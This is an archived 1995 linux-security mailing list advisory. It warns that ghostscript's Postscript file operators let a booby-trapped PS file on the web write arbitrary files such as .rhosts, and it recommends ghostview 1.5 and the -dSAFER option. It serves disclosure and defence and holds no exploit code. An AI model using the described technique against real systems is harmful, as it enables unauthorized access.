[270] in linux-security and linux-alert archive
Hacking a site with Postscript
daemon@ATHENA.MIT.EDU (Olaf Kirch)
Mon Jul 3 19:56:24 1995
From: okir@monad.swb.de (Olaf Kirch)
To: linux-security@tarsier.cv.nrao.edu
Date: Mon, 3 Jul 1995 18:04:20 +0200 (MET DST)
-----BEGIN PGP SIGNED MESSAGE-----
Hi all,
The following should concern all you web users out there:
Starting with Level 2, Postscript implements a number of file operators
that allow you to read and write arbitrary files. Newer versions of
ghostscript implement these operators. (I checked 2.6.1, and it does.
I don't know about 2.5 and earlier, though). To round off the picture,
it also features a non-standard operator named getenv to read things
like your HOME directory from your environment.
This can be exploited to open up your system by writing to your .rhosts
file. While this is not so dangerous with postscript files distributed
via FTP, MIME-aware WWW clients make planting these traps on the Web
all too easy. Needless to say, you can configure your HTTP daemon to
log all accesses, so tracking the downloaders of this infected PS file
is simple.
While ghostscript itself has a switch to disable file writing (command-
line option -dSAFER), this is not enabled by ghostview 1.4 per default.
On the other hand, ghostview 1.5 turns this on by default (and has its
own pair of commandline options to toggle this behavior).
To be safe from this type of attack, make sure you run ghostview 1.5.
Also make sure that the -safer option is not being turned off in the
resource file (the resource name is *safer).
There is now also a bulletin by DFNCERT, the German branch of CERT.
If there's any interest in this, and if I find the time, I may send out
a translation to linux-security.
We will also release a somewhat briefer description of this hole to
linux-alert.
Olaf
- - --
Olaf Kirch | --- o --- Nous sommes du soleil we love when we play
okir@monad.swb.de | / | \ sol.dhoop.naytheet.ah kin.ir.samse.qurax
For my PGP public key, finger okir@brewhq.swb.de.
-----BEGIN PGP SIGNATURE-----
Version: 2.6
iQCUAgUBL/gU9uFnVHXv40etAQHO1AP4gd25k2jYwt6IyuuptO0D8afZC9CfGeT4
u9PpyED/99QVJjw/NXIslsS76abC+7nL+mI0tgwgjqW7KaXUqUIpYMP+FYozwhlX
QUfaPlMHag0+VFr3xrL555Il4Appf4Ccu52COwp8u+2wtTq/66H8p+2MSzW4GQx1
ZwftvSgdWQ==
=uLnh
-----END PGP SIGNATURE-----
